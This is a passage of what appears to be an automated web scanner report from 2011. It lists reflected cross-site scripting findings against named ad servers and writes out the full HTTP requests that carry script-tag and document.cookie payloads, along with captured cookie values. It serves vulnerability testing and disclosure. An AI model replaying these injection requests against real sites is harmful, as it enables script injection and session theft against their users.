Referer: http://www.electronista.com/articles/11/02/04/sales.of.glasses.free.3d.tvs.weaker.than.expected/?e4c13%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Ec3b351ab889=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-724637325-1295907700201; __utmz=229010307.1295907700.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=229010307.737407932.1295907700.1295907700.1295907700.1; __qseg=Q_D|Q_T|Q_2891|Q_2867|Q_2866|Q_2865|Q_2363|Q_2362|Q_2355|Q_2353|Q_2352|Q_2349|Q_2339|Q_1286|Q_1160|Q_1159|Q_1156|Q_1149|Q_1148|Q_983; user_unique_ident=4d4300485cccb8.88856407-57c11f7a933564d3f62b1bb71b01e19d
Response
HTTP/1.1 200 OK
Server: nginx/0.7.67
Date: Sun, 06 Feb 2011 20:38:11 GMT
Content-Type: text/html
Connection: close
P3P: CP="CAO PSA"
X-RateLimit-Limit: 400
X-RateLimit-Remaining: 374
X-Served-By: h04
Content-Length: 117
aptureJsonCallback1f3298<script>alert(1)</script>b6048824017({"status":"failure","comment":"unable to resolve URL"});
The value of the func request parameter is copied into the HTML document as plain text between tags. The payload ac334<script>alert(1)</script>4007ecfe708 was submitted in the func parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /b/rc.pli?func=COMSCORE.BMX.Broker.handleInteractionac334<script>alert(1)</script>4007ecfe708&n=ar_int_p85001580&1297025046004 HTTP/1.1
Host: ar.voicefive.com
Proxy-Connection: keep-alive
Referer: http://ad.doubleclick.net/adi/N3867.270604.B3/B5128597.5;sz=160x600;click0=http://r1-ads.ace.advertising.com/click/site=0000787354/mnum=0000967043/cstr=18771686=_4d4f07c5,5603181230,787354_967043_1183_0,1_/xsxdata=1:93218262/bnum=18771686/optn=64?trg=http://b3.mookie1.com/RealMedia/ads/click_lx.ads/AOLB3/RadioShack/SDYN_2011Q1/160/L32/671449763/x90/USNetwork/RS_SDYN_2011Q1_AOL_DEF_160/RadioShack_SDYN_2011Q1.html/72634857383030695a694d41416f6366?http://b3.mookie1.com/RealMedia/ads/click_lx.ads/AOLB3/RadioShack/SELL_2011Q1/CPA/160/L36/1485203807/x90/USNetwork/RS_SELL_2011Q1_AOL_CPA_160/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366?;ord=1485203807?
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ar_p67161473=exp=1&initExp=Sat Jan 8 03:20:09 2011&recExp=Sat Jan 8 03:20:09 2011&prad=55352400&cpn=4&arc=38899481&; ar_p83612734=exp=1&initExp=Fri Jan 28 22:52:05 2011&recExp=Fri Jan 28 22:52:05 2011&prad=57555319&arc=39967551&; ar_p45555483=exp=1&initExp=Sat Jan 29 01:32:02 2011&recExp=Sat Jan 29 01:32:02 2011&prad=59007464&arc=38601779&; ar_p68511049=exp=6&initExp=Mon Jan 31 16:31:23 2011&recExp=Sun Feb 6 13:40:00 2011&prad=264255445&arc=185637072&; ar_da39f516a098b3de) ar_p85001580=exp=44&initExp=Wed Jan 26 20:14:29 2011&recExp=Sun Feb 6 20:42:50 2011&prad=58087444&arc=40461884&; BMX_3PC=1; UID=1d29d89e-72.246.30.75-1294456810; BMX_G=method%2D%3E%2D1%2Cts%2D%3E1297024970%2E607%2Cwait%2D%3E10000%2C
Response
HTTP/1.1 200 OK
Server: nginx
Date: Sun, 06 Feb 2011 20:43:03 GMT
Content-Type: application/x-javascript
Connection: close
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent,Accept-Encoding
Content-Length: 83
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b311e"><script>alert(1)</script>70aa52fbe42 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /adiframeb311e"><script>alert(1)</script>70aa52fbe42/3.0/5113.1/221794/0/-1/size=160x600;noperf=1;alias=93220029;cfp=1;noaddonpl=y;kvpg=bloggingstocks;kvugc=0;kvmn=93220029;target=_blank;aduho=-360;grp=24244844;misc=24244844 HTTP/1.1
Host: at.atwola.com
Proxy-Connection: keep-alive
Referer: http://www.bloggingstocks.com/?f020e%22-alert(document.cookie)-%22014356e96ab=1
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ATTACID=a3Z0aWQ9MTZpZjE3YTBrcTBiZ2Q=; CfP=1; JEB2=4D4EEFDF6E651A440C6EAF39F00070C8; AxData=1#60488; Axxd=1; ATTAC=a3ZzZWc9OTk5OTk6NTAwMTI6NTExMzM6NTExODQ6NTI2MTE6NTI2MTU6NTI5NDc6NTM1NzU6NTQ0OTA6NTQ4OTg6NTQ5Mzg6NTQ5NTQ6NTY0MzI6NTY1NTU6NTY3MzI6NTY3MzM6NTY3ODA6NjA0MjU6NjA0ODg6NjA0OTA6NjA0OTE6NjA1MDY6NjA3Mzk6NjE2NzQ6NTAyMTM6NTAyMjA6NTAyMDQ6NTAyMzc6NTAyMjg6NTAyMjk=
Response
HTTP/1.0 200 OK
Connection: close
Content-Type: text/html
Content-Length: 367
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c0aea"><script>alert(1)</script>048f105caf6 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /adiframe/3.0c0aea"><script>alert(1)</script>048f105caf6/5113.1/221794/0/-1/size=160x600;noperf=1;alias=93220029;cfp=1;noaddonpl=y;kvpg=bloggingstocks;kvugc=0;kvmn=93220029;target=_blank;aduho=-360;grp=24244844;misc=24244844 HTTP/1.1
Host: at.atwola.com
Proxy-Connection: keep-alive
Referer: http://www.bloggingstocks.com/?f020e%22-alert(document.cookie)-%22014356e96ab=1
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ATTACID=a3Z0aWQ9MTZpZjE3YTBrcTBiZ2Q=; CfP=1; JEB2=4D4EEFDF6E651A440C6EAF39F00070C8; AxData=1#60488; Axxd=1; ATTAC=a3ZzZWc9OTk5OTk6NTAwMTI6NTExMzM6NTExODQ6NTI2MTE6NTI2MTU6NTI5NDc6NTM1NzU6NTQ0OTA6NTQ4OTg6NTQ5Mzg6NTQ5NTQ6NTY0MzI6NTY1NTU6NTY3MzI6NTY3MzM6NTY3ODA6NjA0MjU6NjA0ODg6NjA0OTA6NjA0OTE6NjA1MDY6NjA3Mzk6NjE2NzQ6NTAyMTM6NTAyMjA6NTAyMDQ6NTAyMzc6NTAyMjg6NTAyMjk=
Response
HTTP/1.0 200 OK
Connection: close
Content-Type: text/html
Content-Length: 367
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6ac20"><script>alert(1)</script>0456f182ac8 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /adiframe/3.0/5113.16ac20"><script>alert(1)</script>0456f182ac8/221794/0/-1/size=160x600;noperf=1;alias=93220029;cfp=1;noaddonpl=y;kvpg=bloggingstocks;kvugc=0;kvmn=93220029;target=_blank;aduho=-360;grp=24244844;misc=24244844 HTTP/1.1
Host: at.atwola.com
Proxy-Connection: keep-alive
Referer: http://www.bloggingstocks.com/?f020e%22-alert(document.cookie)-%22014356e96ab=1
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ATTACID=a3Z0aWQ9MTZpZjE3YTBrcTBiZ2Q=; CfP=1; JEB2=4D4EEFDF6E651A440C6EAF39F00070C8; AxData=1#60488; Axxd=1; ATTAC=a3ZzZWc9OTk5OTk6NTAwMTI6NTExMzM6NTExODQ6NTI2MTE6NTI2MTU6NTI5NDc6NTM1NzU6NTQ0OTA6NTQ4OTg6NTQ5Mzg6NTQ5NTQ6NTY0MzI6NTY1NTU6NTY3MzI6NTY3MzM6NTY3ODA6NjA0MjU6NjA0ODg6NjA0OTA6NjA0OTE6NjA1MDY6NjA3Mzk6NjE2NzQ6NTAyMTM6NTAyMjA6NTAyMDQ6NTAyMzc6NTAyMjg6NTAyMjk=
Response
HTTP/1.0 200 OK
Connection: close
Content-Type: text/html
Content-Length: 367
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 309fa"><script>alert(1)</script>a95da17c31 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /adiframe/3.0/5113.1/221794309fa"><script>alert(1)</script>a95da17c31/0/-1/size=160x600;noperf=1;alias=93220029;cfp=1;noaddonpl=y;kvpg=bloggingstocks;kvugc=0;kvmn=93220029;target=_blank;aduho=-360;grp=24244844;misc=24244844 HTTP/1.1
Host: at.atwola.com
Proxy-Connection: keep-alive
Referer: http://www.bloggingstocks.com/?f020e%22-alert(document.cookie)-%22014356e96ab=1
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ATTACID=a3Z0aWQ9MTZpZjE3YTBrcTBiZ2Q=; CfP=1; JEB2=4D4EEFDF6E651A440C6EAF39F00070C8; AxData=1#60488; Axxd=1; ATTAC=a3ZzZWc9OTk5OTk6NTAwMTI6NTExMzM6NTExODQ6NTI2MTE6NTI2MTU6NTI5NDc6NTM1NzU6NTQ0OTA6NTQ4OTg6NTQ5Mzg6NTQ5NTQ6NTY0MzI6NTY1NTU6NTY3MzI6NTY3MzM6NTY3ODA6NjA0MjU6NjA0ODg6NjA0OTA6NjA0OTE6NjA1MDY6NjA3Mzk6NjE2NzQ6NTAyMTM6NTAyMjA6NTAyMDQ6NTAyMzc6NTAyMjg6NTAyMjk=
Response
HTTP/1.0 200 OK
Connection: close
Content-Type: text/html
Content-Length: 366
The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7aa9b"><script>alert(1)</script>f586567e29c was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /adiframe/3.0/5113.1/221794/07aa9b"><script>alert(1)</script>f586567e29c/-1/size=160x600;noperf=1;alias=93220029;cfp=1;noaddonpl=y;kvpg=bloggingstocks;kvugc=0;kvmn=93220029;target=_blank;aduho=-360;grp=24244844;misc=24244844 HTTP/1.1
Host: at.atwola.com
Proxy-Connection: keep-alive
Referer: http://www.bloggingstocks.com/?f020e%22-alert(document.cookie)-%22014356e96ab=1
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ATTACID=a3Z0aWQ9MTZpZjE3YTBrcTBiZ2Q=; CfP=1; JEB2=4D4EEFDF6E651A440C6EAF39F00070C8; AxData=1#60488; Axxd=1; ATTAC=a3ZzZWc9OTk5OTk6NTAwMTI6NTExMzM6NTExODQ6NTI2MTE6NTI2MTU6NTI5NDc6NTM1NzU6NTQ0OTA6NTQ4OTg6NTQ5Mzg6NTQ5NTQ6NTY0MzI6NTY1NTU6NTY3MzI6NTY3MzM6NTY3ODA6NjA0MjU6NjA0ODg6NjA0OTA6NjA0OTE6NjA1MDY6NjA3Mzk6NjE2NzQ6NTAyMTM6NTAyMjA6NTAyMDQ6NTAyMzc6NTAyMjg6NTAyMjk=
Response
HTTP/1.0 200 OK
Connection: close
Content-Type: text/html
Content-Length: 367
The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c27e3"><script>alert(1)</script>773b6376821 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /adiframe/3.0/5113.1/221794/0/-1c27e3"><script>alert(1)</script>773b6376821/size=160x600;noperf=1;alias=93220029;cfp=1;noaddonpl=y;kvpg=bloggingstocks;kvugc=0;kvmn=93220029;target=_blank;aduho=-360;grp=24244844;misc=24244844 HTTP/1.1 Host: at.atwola.com Proxy-Connection: keep-alive Referer: http://www.bloggingstocks.com/?f020e%22-alert(document.cookie)-%22014356e96ab=1 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: ATTACID=a3Z0aWQ9MTZpZjE3YTBrcTBiZ2Q=; CfP=1; JEB2=4D4EEFDF6E651A440C6EAF39F00070C8; AxData=1#60488; Axxd=1; ATTAC=a3ZzZWc9OTk5OTk6NTAwMTI6NTExMzM6NTExODQ6NTI2MTE6NTI2MTU6NTI5NDc6NTM1NzU6NTQ0OTA6NTQ4OTg6NTQ5Mzg6NTQ5NTQ6NTY0MzI6NTY1NTU6NTY3MzI6NTY3MzM6NTY3ODA6NjA0MjU6NjA0ODg6NjA0OTA6NjA0OTE6NjA1MDY6NjA3Mzk6NjE2NzQ6NTAyMTM6NTAyMjA6NTAyMDQ6NTAyMzc6NTAyMjg6NTAyMjk=
Response
HTTP/1.0 200 OK Connection: close Content-Type: text/html Content-Length: 367
The value of REST URL parameter 7 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ce70a"><script>alert(1)</script>735d74c1b51 was submitted in the REST URL parameter 7. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /adiframe/3.0/5113.1/221794/0/-1/sizece70a"><script>alert(1)</script>735d74c1b51=160x600;noperf=1;alias=93220029;cfp=1;noaddonpl=y;kvpg=bloggingstocks;kvugc=0;kvmn=93220029;target=_blank;aduho=-360;grp=24244844;misc=24244844 HTTP/1.1 Host: at.atwola.com Proxy-Connection: keep-alive Referer: http://www.bloggingstocks.com/?f020e%22-alert(document.cookie)-%22014356e96ab=1 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: ATTACID=a3Z0aWQ9MTZpZjE3YTBrcTBiZ2Q=; CfP=1; JEB2=4D4EEFDF6E651A440C6EAF39F00070C8; AxData=1#60488; Axxd=1; ATTAC=a3ZzZWc9OTk5OTk6NTAwMTI6NTExMzM6NTExODQ6NTI2MTE6NTI2MTU6NTI5NDc6NTM1NzU6NTQ0OTA6NTQ4OTg6NTQ5Mzg6NTQ5NTQ6NTY0MzI6NTY1NTU6NTY3MzI6NTY3MzM6NTY3ODA6NjA0MjU6NjA0ODg6NjA0OTA6NjA0OTE6NjA1MDY6NjA3Mzk6NjE2NzQ6NTAyMTM6NTAyMjA6NTAyMDQ6NTAyMzc6NTAyMjg6NTAyMjk=
Response
HTTP/1.0 200 OK Connection: close Content-Type: text/html Content-Length: 367
1.50. http://at.atwola.com/adiframe/3.0/5113.1/221794/0/-1/size=160x600 [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://at.atwola.com
Path: /adiframe/3.0/5113.1/221794/0/-1/size=160x600
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d167e"><script>alert(1)</script>5532f5945a4 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /adiframe/3.0/5113.1/221794/0/-1/size=160x600;noperf=1;alias=93220029;cfp=1;noaddonpl=y;kvpg=bloggingstocks;kvugc=0;kvmn=93220029;target=_blank;aduho=-360;grp=24244844;misc=24244844&d167e"><script>alert(1)</script>5532f5945a4=1 HTTP/1.1 Host: at.atwola.com Proxy-Connection: keep-alive Referer: http://www.bloggingstocks.com/?f020e%22-alert(document.cookie)-%22014356e96ab=1 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: ATTACID=a3Z0aWQ9MTZpZjE3YTBrcTBiZ2Q=; CfP=1; JEB2=4D4EEFDF6E651A440C6EAF39F00070C8; AxData=1#60488; Axxd=1; ATTAC=a3ZzZWc9OTk5OTk6NTAwMTI6NTExMzM6NTExODQ6NTI2MTE6NTI2MTU6NTI5NDc6NTM1NzU6NTQ0OTA6NTQ4OTg6NTQ5Mzg6NTQ5NTQ6NTY0MzI6NTY1NTU6NTY3MzI6NTY3MzM6NTY3ODA6NjA0MjU6NjA0ODg6NjA0OTA6NjA0OTE6NjA1MDY6NjA3Mzk6NjE2NzQ6NTAyMTM6NTAyMjA6NTAyMDQ6NTAyMzc6NTAyMjg6NTAyMjk=
Response
HTTP/1.0 200 OK Connection: close Content-Type: text/html Content-Length: 370
The value of the noperf request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c6861"><script>alert(1)</script>ad0c3bcb1e7 was submitted in the noperf parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /adiframe/3.0/5113.1/221794/0/-1/size=160x600;noperf=1;alias=93220029;cfp=1;noaddonpl=y;kvpg=bloggingstocks;kvugc=0;kvmn=93220029;target=_blank;aduho=-360;grp=24244844;misc=24244844c6861"><script>alert(1)</script>ad0c3bcb1e7 HTTP/1.1 Host: at.atwola.com Proxy-Connection: keep-alive Referer: http://www.bloggingstocks.com/?f020e%22-alert(document.cookie)-%22014356e96ab=1 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: ATTACID=a3Z0aWQ9MTZpZjE3YTBrcTBiZ2Q=; CfP=1; JEB2=4D4EEFDF6E651A440C6EAF39F00070C8; AxData=1#60488; Axxd=1; ATTAC=a3ZzZWc9OTk5OTk6NTAwMTI6NTExMzM6NTExODQ6NTI2MTE6NTI2MTU6NTI5NDc6NTM1NzU6NTQ0OTA6NTQ4OTg6NTQ5Mzg6NTQ5NTQ6NTY0MzI6NTY1NTU6NTY3MzI6NTY3MzM6NTY3ODA6NjA0MjU6NjA0ODg6NjA0OTA6NjA0OTE6NjA1MDY6NjA3Mzk6NjE2NzQ6NTAyMTM6NTAyMjA6NTAyMDQ6NTAyMzc6NTAyMjg6NTAyMjk=
Response
HTTP/1.0 200 OK Connection: close Content-Type: text/html Content-Length: 367
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 48ed2"><script>alert(1)</script>a7413131d8b was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /adiframe48ed2"><script>alert(1)</script>a7413131d8b/3.0/5113.1/221794/0/-1/size=300x250 HTTP/1.1 Host: at.atwola.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JEB2=4D4EEFDF6E651A440C6EAF39F00070C8; ATTAC=a3ZzZWc9OTk5OTk6NTAwMTI6NTExMzM6NTExODQ6NTI2MTE6NTI2MTU6NTI5NDc6NTM1NzU6NTQ0OTA6NTQ4OTg6NTQ5Mzg6NTQ5NTQ6NTY0MzI6NTY1NTU6NTY3MzI6NTY3MzM6NTY3ODA6NjA0MjU6NjA0ODg6NjA0OTA6NjA0OTE6NjA1MDY6NjA3Mzk6NjE2NzQ6NTAyMTM6NTAyMjA6NTAyMDQ=; CfP=1; ATTACID=a3Z0aWQ9MTZpZjE3YTBrcTBiZ2Q=;
Response
HTTP/1.0 200 OK Connection: close Content-Type: text/html Content-Length: 229
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8a33b"><script>alert(1)</script>d2b240b8cbd was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /adiframe/3.08a33b"><script>alert(1)</script>d2b240b8cbd/5113.1/221794/0/-1/size=300x250 HTTP/1.1 Host: at.atwola.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JEB2=4D4EEFDF6E651A440C6EAF39F00070C8; ATTAC=a3ZzZWc9OTk5OTk6NTAwMTI6NTExMzM6NTExODQ6NTI2MTE6NTI2MTU6NTI5NDc6NTM1NzU6NTQ0OTA6NTQ4OTg6NTQ5Mzg6NTQ5NTQ6NTY0MzI6NTY1NTU6NTY3MzI6NTY3MzM6NTY3ODA6NjA0MjU6NjA0ODg6NjA0OTA6NjA0OTE6NjA1MDY6NjA3Mzk6NjE2NzQ6NTAyMTM6NTAyMjA6NTAyMDQ=; CfP=1; ATTACID=a3Z0aWQ9MTZpZjE3YTBrcTBiZ2Q=;
Response
HTTP/1.0 200 OK Connection: close Content-Type: text/html Content-Length: 229
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cf8ec"><script>alert(1)</script>b39abb6cf7 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /adiframe/3.0/5113.1cf8ec"><script>alert(1)</script>b39abb6cf7/221794/0/-1/size=300x250 HTTP/1.1 Host: at.atwola.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JEB2=4D4EEFDF6E651A440C6EAF39F00070C8; ATTAC=a3ZzZWc9OTk5OTk6NTAwMTI6NTExMzM6NTExODQ6NTI2MTE6NTI2MTU6NTI5NDc6NTM1NzU6NTQ0OTA6NTQ4OTg6NTQ5Mzg6NTQ5NTQ6NTY0MzI6NTY1NTU6NTY3MzI6NTY3MzM6NTY3ODA6NjA0MjU6NjA0ODg6NjA0OTA6NjA0OTE6NjA1MDY6NjA3Mzk6NjE2NzQ6NTAyMTM6NTAyMjA6NTAyMDQ=; CfP=1; ATTACID=a3Z0aWQ9MTZpZjE3YTBrcTBiZ2Q=;
Response
HTTP/1.0 200 OK Connection: close Content-Type: text/html Content-Length: 228
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 984e3"><script>alert(1)</script>381ff05b531 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /adiframe/3.0/5113.1/221794984e3"><script>alert(1)</script>381ff05b531/0/-1/size=300x250 HTTP/1.1 Host: at.atwola.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JEB2=4D4EEFDF6E651A440C6EAF39F00070C8; ATTAC=a3ZzZWc9OTk5OTk6NTAwMTI6NTExMzM6NTExODQ6NTI2MTE6NTI2MTU6NTI5NDc6NTM1NzU6NTQ0OTA6NTQ4OTg6NTQ5Mzg6NTQ5NTQ6NTY0MzI6NTY1NTU6NTY3MzI6NTY3MzM6NTY3ODA6NjA0MjU6NjA0ODg6NjA0OTA6NjA0OTE6NjA1MDY6NjA3Mzk6NjE2NzQ6NTAyMTM6NTAyMjA6NTAyMDQ=; CfP=1; ATTACID=a3Z0aWQ9MTZpZjE3YTBrcTBiZ2Q=;
Response
HTTP/1.0 200 OK Connection: close Content-Type: text/html Content-Length: 229
The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e7efe"><script>alert(1)</script>184e0a940d6 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /adiframe/3.0/5113.1/221794/0e7efe"><script>alert(1)</script>184e0a940d6/-1/size=300x250 HTTP/1.1 Host: at.atwola.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JEB2=4D4EEFDF6E651A440C6EAF39F00070C8; ATTAC=a3ZzZWc9OTk5OTk6NTAwMTI6NTExMzM6NTExODQ6NTI2MTE6NTI2MTU6NTI5NDc6NTM1NzU6NTQ0OTA6NTQ4OTg6NTQ5Mzg6NTQ5NTQ6NTY0MzI6NTY1NTU6NTY3MzI6NTY3MzM6NTY3ODA6NjA0MjU6NjA0ODg6NjA0OTA6NjA0OTE6NjA1MDY6NjA3Mzk6NjE2NzQ6NTAyMTM6NTAyMjA6NTAyMDQ=; CfP=1; ATTACID=a3Z0aWQ9MTZpZjE3YTBrcTBiZ2Q=;
Response
HTTP/1.0 200 OK Connection: close Content-Type: text/html Content-Length: 229
The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7c147"><script>alert(1)</script>c56f6924a19 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /adiframe/3.0/5113.1/221794/0/-17c147"><script>alert(1)</script>c56f6924a19/size=300x250 HTTP/1.1 Host: at.atwola.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JEB2=4D4EEFDF6E651A440C6EAF39F00070C8; ATTAC=a3ZzZWc9OTk5OTk6NTAwMTI6NTExMzM6NTExODQ6NTI2MTE6NTI2MTU6NTI5NDc6NTM1NzU6NTQ0OTA6NTQ4OTg6NTQ5Mzg6NTQ5NTQ6NTY0MzI6NTY1NTU6NTY3MzI6NTY3MzM6NTY3ODA6NjA0MjU6NjA0ODg6NjA0OTA6NjA0OTE6NjA1MDY6NjA3Mzk6NjE2NzQ6NTAyMTM6NTAyMjA6NTAyMDQ=; CfP=1; ATTACID=a3Z0aWQ9MTZpZjE3YTBrcTBiZ2Q=;
Response
HTTP/1.0 200 OK Connection: close Content-Type: text/html Content-Length: 229
